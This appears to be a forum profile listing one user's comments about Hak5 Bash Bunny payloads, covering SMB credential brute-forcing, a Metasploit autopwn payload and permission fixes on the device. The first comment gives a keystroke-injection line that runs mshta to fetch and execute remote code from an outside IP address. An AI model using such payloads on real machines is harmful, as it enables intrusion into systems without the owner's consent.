Mohamed A. Baset

  1. Modify the last injected payload from: QUACK STRING "mshta http://192.168.171.32:443/index" to QUACK STRING "mshta http://192.168.171.32:443/index;exit"
  2. @PoSHMagiC0de In fact it's not my python script but a good idea and can be implemented!
  3. What about the firewall? Because sometimes the port is locally opened but filtered by the firewall to be accessed from outside the local machine!
  4. + If you want more speed try this payload: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/SMBruteBunny
  5. As indicated, "mmcbrute" could not connect to host "172.16.64.10" on port "445". That's actually a weird error since the target IP address is being obtained automatically from BB's DHCP server. Debug: try to make sure: 1. That the target already got this IP address "172.16.64.10" from BB DHCP server's IP pool; if not, then there is something wrong! 2. The target has no firewall activated; if so, BB won't be able to reach port 445 to perform the brute-force attack!
  6. Here is another refined version: https://github.com/hak5/bashbunny-payloads/pull/383 Waiting for merging the PR. Cheers!
  7. You can watch the video I did. Unfortunately, it takes like 3 minutes minimum and with "CUCUMBER PLAID" too, check here: https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
  8. @Darren Kitchen and @CatatonicPrime The problem is that Metasploit Framework takes forever to load on the humble specifications of BashBunny. I have done this like two years ago:
  9. YW Man, I'm so excited to dig on your scenario this weekend, the idea of deauthing, probing and beaconing to get all the clients connected to the tetra then attack them with the bunny seems very interesting!
  10. 1. Installed ruby via "rbenv" (2.4.1 armhf is preferred)
      2. Cloned Rapid7's metasploit repo inside /tools/
      3. cd to /tools/metasploit-framework/
      4. gem install bundler
      5. bundle install
      7. Bingo!
  11. And finally I did the PR: https://github.com/hak5/bashbunny-payloads/pull/242 Waiting for approval!
  12. @Sebkinne @Darren Kitchen This must be configured in the next bunny update to add the "postgres" user to the network user groups: usermod -a -G netdev,systemd-network,net_raw postgres What do you think?
  13. Glad to hear that, I suffered too to finally figure out the real problem. Now we have lots of attack possibilities, Share with me the good stuff you're thinking about tho :) I'm planning to release my Metasploit Autopwn bashbunny payload very soon.
  14. As I mentioned before, this might be 99% an issue with the user privileges because the "postgres" user is not added to the user groups where it can access the network. Try: usermod -a -G netdev,systemd-network,net_raw postgres Then tell me if it works or not + the exact problem if it exists!
  15. I don't know if you are familiar with other Hak5 products or not but LanTurtle would be more reliable in the attack scenario you are describing here!